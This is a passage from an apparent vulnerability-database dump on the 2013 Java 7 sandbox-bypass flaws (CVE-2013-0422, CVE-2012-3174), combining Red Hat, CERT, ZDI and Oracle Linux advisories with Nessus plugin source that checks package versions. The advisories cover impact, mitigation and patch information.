CVE-2012-3174,\nCVE-2012-3213, CVE-2012-3342, CVE-2013-0351, CVE-2013-0409, CVE-2013-0419,\nCVE-2013-0422, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425, CVE-2013-0426,\nCVE-2013-0427, CVE-2013-0428, CVE-2013-0431, CVE-2013-0432, CVE-2013-0433,\nCVE-2013-0434, CVE-2013-0435, CVE-2013-0437, CVE-2013-0438, CVE-2013-0440,\nCVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0444, CVE-2013-0445,\nCVE-2013-0446, CVE-2013-0449, CVE-2013-0450, CVE-2013-0809, CVE-2013-1473,\nCVE-2013-1476, CVE-2013-1478, CVE-2013-1480, CVE-2013-1484, CVE-2013-1485,\nCVE-2013-1486, CVE-2013-1487, CVE-2013-1493)\n\nAll users of java-1.7.0-ibm are advised to upgrade to these updated\npackages, containing the IBM Java SE 7 SR4 release. All running instances\nof IBM Java must be restarted for the update to take effect.\n", "modified": "2018-06-07T09:04:36", "published": "2013-03-11T04:00:00", "id": "RHSA-2013:0626", "href": "https://access.redhat.com/errata/RHSA-2013:0626", "type": "redhat", "title": "(RHSA-2013:0626) Critical: java-1.7.0-ibm security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:41:54", "bulletinFamily": "info", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "### Overview \n\nJava 7 Update 10 and earlier versions of Java 7 contain a vulnerability that can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nThe Oracle Java Runtime Environment (JRE) 1.7 allows users to run Java applications in a browser or as standalone programs. Oracle has made the JRE available for multiple operating systems. OpenJDK is an open-source implementation of the Java platform, and the IcedTea project aims to make it easier to deploy OpenJDK, including a web browser plugin.\n\nThe Java JRE plug-in provides its own [Security Manager](<http://docs.oracle.com/javase/7/docs/api/java/lang/System.html#setSecurityManager%28java.lang.SecurityManager%29>). Typically, a web applet runs with a security manager provided by the browser or Java Web Start plugin. Oracle's document [states](<http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/System.html#setSecurityManager%28java.lang.SecurityManager%29>), _\"If there is a security manager already installed, this method first calls the security manager's _`_checkPermission_`_ method with a _`_RuntimePermission(\"setSecurityManager\")_`_ permission to ensure it's safe to replace the existing security manager. This may result in throwing a _`_SecurityException\"_`_._ \n \nBy leveraging the a vulnerability in the [Java Management Extensions](<http://docs.oracle.com/javase/tutorial/jmx/index.html>) (JMX) [MBean](<http://docs.oracle.com/javase/tutorial/jmx/mbeans/index.html>) components, unprivileged Java code can access restricted classes. By using that vulnerability in conjunction with a second vulnerability involving recursive use of the Reflection API via the [invokeWithArguments](<http://docs.oracle.com/javase/7/docs/api/java/lang/invoke/MethodHandle.html#invokeWithArguments%28java.util.List%29>) method of the [MethodHandle](<http://docs.oracle.com/javase/7/docs/api/java/lang/invoke/MethodHandle.html>) class, an untrusted Java applet can escalate its privileges by calling the the [setSecurityManager()](<http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/System.html#setSecurityManager%28java.lang.SecurityManager%29>) function to allow full privileges, without requiring code signing. Oracle Java 7 update 10 and earlier Java 7 versions are affected. OpenJDK 7, and subsequently [IcedTea](<http://permalink.gmane.org/gmane.comp.java.openjdk.distro-packaging.devel/21381>), are also [affected](<https://bugzilla.redhat.com/show_bug.cgi?id=894172>). The invokeWithArguments method was introduced with Java 7, so therefore Java 6 is not affected. \n \nThis vulnerability is being attacked in the wild, and is reported to be incorporated into exploit kits. Exploit code for this vulnerability is also publicly available. We have confirmed that Oracle Java 7 installed on Windows, OS X, and Linux platforms are affected. Other platforms that use Oracle Java 7 may also be affected. \n \n--- \n \n### Impact \n\nBy convincing a user to visit a specially crafted HTML document, a remote attacker may be able to execute arbitrary code on a vulnerable system. Note that applications that use the Internet Explorer web content rendering components, such as Microsoft Office or Windows Desktop Search, may also be used as an attack vector for this vulnerability. \n \n--- \n \n### Solution \n\n**Apply an update** \n \n[Oracle Security Alert CVE-2013-0422](<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>) states that [Java 7 Update 11](<http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html>) addresses this (CVE-2013-0422) and an equally severe, but distinct vulnerability (CVE-2012-3174). Immunity [has indicated](<http://immunityproducts.blogspot.ca/2013/01/confirmed-java-only-fixed-one-of-two.html>) that only the reflection vulnerability has been fixed and that the JMX MBean vulnerability remains. Java 7u11 sets the default Java security settings to \"High\" so that users will be prompted before running unsigned or self-signed Java applets. \n \nUnless it is absolutely necessary to run Java in web browsers, disable it as described below, even after updating to 7u11. This will help mitigate other Java vulnerabilities that may be discovered in the future. \n \nThis issue has also been addressed in [IcedTea versions 2.1.4, 2.2.4, and 2.3.4](<http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-January/021413.html>). \n \n--- \n \n**Disable Java in web browsers**\n\nStarting with Java 7 Update 10, it is possible to [disable Java content in web browsers](<http://www.java.com/en/download/help/disable_browser.xml>) through the Java control panel applet. Please see the [Java documentation](<http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/client-security.html#disable>) for more details. \n \n**Note**: Due to what appears to potentially be a bug in the Java installer, the Java Control Panel applet may be missing on some Windows systems. In such cases, the Java Control Panel applet may be launched by finding and executing `javacpl.exe` manually. This file is likely to be found in `C:\\Program Files\\Java\\jre7\\bin` or `C:\\Program Files (x86)\\Java\\jre7\\bin`. \n \n**Also note** that we have encountered situations on Windows where Java will crash if it has been disabled in the web browser as described above and then subsequently re-enabled. Depending on the browser used, this [Michael Horowitz has pointed out](<http://blogs.computerworld.com/cybercrime-and-hacking/21664/understanding-new-security-java-7-update-11>) that performing the same steps on Windows 7 will result in unsigned Java applets executing without prompting in Internet Explorer, despite what the \"Security Level\" slider in the Java Control panel applet is configured to use. We have confirmed this behavior with Internet Explorer on both Windows 7 and Vista. Reinstalling Java appears to correct both of these situations. \n \nSystem administrators wishing to deploy Java 7 Update 10 or later with the \"Enable Java content in the browser\" feature disabled can invoke the Java installer with the `WEB_JAVA=0` command-line option. More details are available in the [Java documentation](<http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/client-security.html#install>). \n \nAlternatively, Microsoft has released a [Fix it](<http://blogs.technet.com/b/srd/archive/2013/05/29/java-when-you-cannot-let-go.aspx>) that disables Java in the Internet Explorer web browser. \n \n**Restrict access to Java applets** \n \nNetwork administrators unable to disable Java in web browsers may be able to help mitigate this and other Java vulnerabilities by restricting access to Java applets. This may be accomplished by using proxy server rules, for example. Blocking or whitelisting web requests to `.jar` and `.class` files can help to prevent Java from being used by untrusted sources. Filtering requests that contain a Java User-Agent header may also be effective. For example, this technique can be used in environments where Java is required on the local intranet. The proxy can be configured to allow Java requests locally, but block them when the destination is a site on the internet. \n \n--- \n \n### Vendor Information\n\n625617\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### IcedTea Affected\n\nUpdated: January 16, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://permalink.gmane.org/gmane.comp.java.openjdk.distro-packaging.devel/21381>\n * <http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-January/021413.html>\n\n### OpenJDK Affected\n\nUpdated: January 14, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://access.redhat.com/security/cve/CVE-2013-0422>\n\n### Oracle Corporation Affected\n\nNotified: January 11, 2013 Updated: January 13, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://blogs.oracle.com/security/entry/security_alert_for_cve_2013>\n * <http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>\n * <http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html>\n\n### Red Hat, Inc. Affected\n\nUpdated: January 17, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://rhn.redhat.com/errata/RHSA-2013-0165.html>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=894172>\n\n### Sun Microsystems, Inc. Affected\n\nNotified: January 11, 2013 Updated: January 12, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM Corporation Not Affected\n\nNotified: January 14, 2013 Updated: January 14, 2013 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www-304.ibm.com/connections/blogs/PSIRT/entry/oracle_java_7_security_manager_bypass_vulnerability_cve_2013_04224>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 9.5 | E:H/RL:W/RC:C \nEnvironmental | 9.5 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://krebsonsecurity.com/2013/01/what-you-need-to-know-about-the-java-exploit/>\n * <http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html>\n * <http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/>\n * <http://seclists.org/bugtraq/2013/Jan/48>\n * <http://seclists.org/fulldisclosure/2013/Jan/77>\n * <http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf>\n * <http://docs.oracle.com/javase/7/docs/api/java/lang/invoke/MethodHandle.html#invokeWithArguments%28java.util.List%29>\n * <http://www.java.com/en/download/help/disable_browser.xml>\n * <https://partners.immunityinc.com/idocs/Java%20MBeanInstantiator.findClass%200day%20Analysis.pdf>\n * <https://blogs.oracle.com/security/entry/security_alert_for_cve_2013>\n * <http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>\n * <http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=894172>\n * <https://partners.immunityinc.com/idocs/Java%20MBeanInstantiator.findClass%200day%20Analysis.pdf>\n * <http://immunityproducts.blogspot.ca/2013/01/confirmed-java-only-fixed-one-of-two.html>\n * <https://www-304.ibm.com/connections/blogs/PSIRT/entry/oracle_java_7_security_manager_bypass_vulnerability_cve_2013_04224>\n * <http://permalink.gmane.org/gmane.comp.java.openjdk.distro-packaging.devel/21381>\n * <http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-January/021413.html>\n * <http://blogs.computerworld.com/cybercrime-and-hacking/21664/understanding-new-security-java-7-update-11>\n * <http://codeascraft.etsy.com/2013/03/18/java-not-even-once/>\n\n### Acknowledgements\n\nThanks to Kafeine for reporting this vulnerability.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2013-0422](<http://web.nvd.nist.gov/vuln/detail/CVE-2013-0422>) \n---|--- \n**Date Public:** | 2013-01-10 \n**Date First Published:** | 2013-01-10 \n**Date Last Updated: ** | 2013-06-12 18:29 UTC \n**Document Revision: ** | 143 \n", "modified": "2013-06-12T18:29:00", "published": "2013-01-10T00:00:00", "id": "VU:625617", "href": "https://www.kb.cert.org/vuls/id/625617", "type": "cert", "title": "Java 7 fails to restrict access to privileged code", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:42:21", "bulletinFamily": "info", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Oracle Java Runtime Environment. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific bypass exists within usage of MethodHandle to the invoke method in the sun.misc.reflect.Trampoline class. This allows a malicious applet to execute attacker supplied code resulting in remote code execution under the context of the current user.", "modified": "2013-06-22T00:00:00", "published": "2013-02-01T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-002/", "id": "ZDI-13-002", "title": "Oracle Java Runtime Environment MethodHandle Security Manager Bypass Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:49", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "[1.7.0.9-2.3.4.1.0.1.el6_3]\n- Update DISTRO_NAME in specfile\n[1.7.0.9-2.3.4.1.el6]\n- Rewerted to IcedTea 2.3.4\n - rewerted patch105: java-1.7.0-openjdk-disable-system-lcms.patch\n - removed jxmd and idlj to alternatives\n - make NOT executed with DISABLE_INTREE_EC=true and UNLIMITED_CRYPTO=true\n - re-applied patch302 and restored systemtap.patch\n - buildver set to 9\n - icedtea_version set to 2.3.4\n - unapplied patch112 java-1.7.openjdk-doNotUseDisabledEcc.patch\n - restored tmp-patches source tarball\n - removed /lib/security/US_export_policy.jar and lib/security/local_policy.jar\n - java-1.7.0-openjdk-java-access-bridge-security.patch's path moved from\n java.security-linux back to java.security\n- Resolves: rhbz#895033\n[1.7.0.11-2.4.0.1.el6]\n- Rewritten patch105: java-1.7.0-openjdk-disable-system-lcms.patch\n- Added jxmd and idlj to alternatives\n- make executed with DISABLE_INTREE_EC=true and UNLIMITED_CRYPTO=true\n- Unapplied patch302 and deleted systemtap.patch\n- buildver increased to 11\n- icedtea_version set to 2.4.0\n- Added and applied patch112 java-1.7.openjdk-doNotUseDisabledEcc.patch\n- removed tmp-patches source tarball\n- Added /lib/security/US_export_policy.jar and lib/security/local_policy.jar\n- Resolves: rhbz#895033", "edition": 4, "modified": "2013-01-16T00:00:00", "published": "2013-01-16T00:00:00", "id": "ELSA-2013-0165", "href": "http://linux.oracle.com/errata/ELSA-2013-0165.html", "title": "java-1.7.0-openjdk security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-09-25T08:55:36", "description": "From Red Hat Security Advisory 2013:0165 :\n\nUpdated java-1.7.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection\nAPI in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2012-3174,\nCVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.", "edition": 20, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 / 6 : java-1.7.0-openjdk (ELSA-2013-0165)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:java-1.7.0-openjdk-devel", "p-cpe:/a:oracle:linux:java-1.7.0-openjdk-javadoc", "p-cpe:/a:oracle:linux:java-1.7.0-openjdk-src", "p-cpe:/a:oracle:linux:java-1.7.0-openjdk-demo", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:java-1.7.0-openjdk"], "id": "ORACLELINUX_ELSA-2013-0165.NASL", "href": "https://www.tenable.com/plugins/nessus/68709", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0165 and \n# Oracle Linux Security Advisory ELSA-2013-0165 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68709);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_xref(name:\"RHSA\", value:\"2013:0165\");\n\n script_name(english:\"Oracle Linux 5 / 6 : java-1.7.0-openjdk (ELSA-2013-0165)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:0165 :\n\nUpdated java-1.7.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection\nAPI in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2012-3174,\nCVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-January/003210.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-January/003211.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1.7.0-openjdk packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.7.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.7.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.7.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.7.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.0.1.el5_9.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.0.1.el5_9.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.0.1.el5_9.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.0.1.el5_9.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.0.1.el5_9.1\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.1.0.1.el6_3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.0.1.el6_3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.0.1.el6_3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.1.0.1.el6_3\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.0.1.el6_3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk / java-1.7.0-openjdk-demo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-25T09:14:30", "description": "Updated java-1.7.0-oracle packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nOracle Java SE version 7 includes the Oracle Java Runtime Environment\nand the Oracle Java Software Development Kit.\n\nThis update fixes two vulnerabilities in the Oracle Java Runtime\nEnvironment and the Oracle Java Software Development Kit. Further\ninformation about these flaws can be found on the Oracle Security\nAlert page, listed in the References section. (CVE-2012-3174,\nCVE-2013-0422)\n\nRed Hat is aware that a public exploit for CVE-2013-0422 is available\nthat executes code without user interaction when a user visits a\nmalicious web page using a browser with the Oracle Java 7 web browser\nplug-in enabled.\n\nAll users of java-1.7.0-oracle are advised to upgrade to these updated\npackages, which provide Oracle Java 7 Update 11 and resolve these\nissues. All running instances of Oracle Java must be restarted for the\nupdate to take effect.", "edition": 20, "published": "2013-01-15T00:00:00", "title": "RHEL 5 / 6 : java-1.7.0-oracle (RHSA-2013:0156)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2013-01-15T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-javafx", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-src", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-devel", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-jdbc", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-plugin"], "id": "REDHAT-RHSA-2013-0156.NASL", "href": "https://www.tenable.com/plugins/nessus/63534", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0156. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63534);\n script_version (\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_xref(name:\"RHSA\", value:\"2013:0156\");\n\n script_name(english:\"RHEL 5 / 6 : java-1.7.0-oracle (RHSA-2013:0156)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.7.0-oracle packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nOracle Java SE version 7 includes the Oracle Java Runtime Environment\nand the Oracle Java Software Development Kit.\n\nThis update fixes two vulnerabilities in the Oracle Java Runtime\nEnvironment and the Oracle Java Software Development Kit. Further\ninformation about these flaws can be found on the Oracle Security\nAlert page, listed in the References section. (CVE-2012-3174,\nCVE-2013-0422)\n\nRed Hat is aware that a public exploit for CVE-2013-0422 is available\nthat executes code without user interaction when a user visits a\nmalicious web page using a browser with the Oracle Java 7 web browser\nplug-in enabled.\n\nAll users of java-1.7.0-oracle are advised to upgrade to these updated\npackages, which provide Oracle Java 7 Update 11 and resolve these\nissues. All running instances of Oracle Java must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2012-3174.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2013-0422.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.oracle.com/technetwork/topics/security/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2013-0156.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-oracle-javafx\");\n script_set_attribute(attribute:\"cpe\", 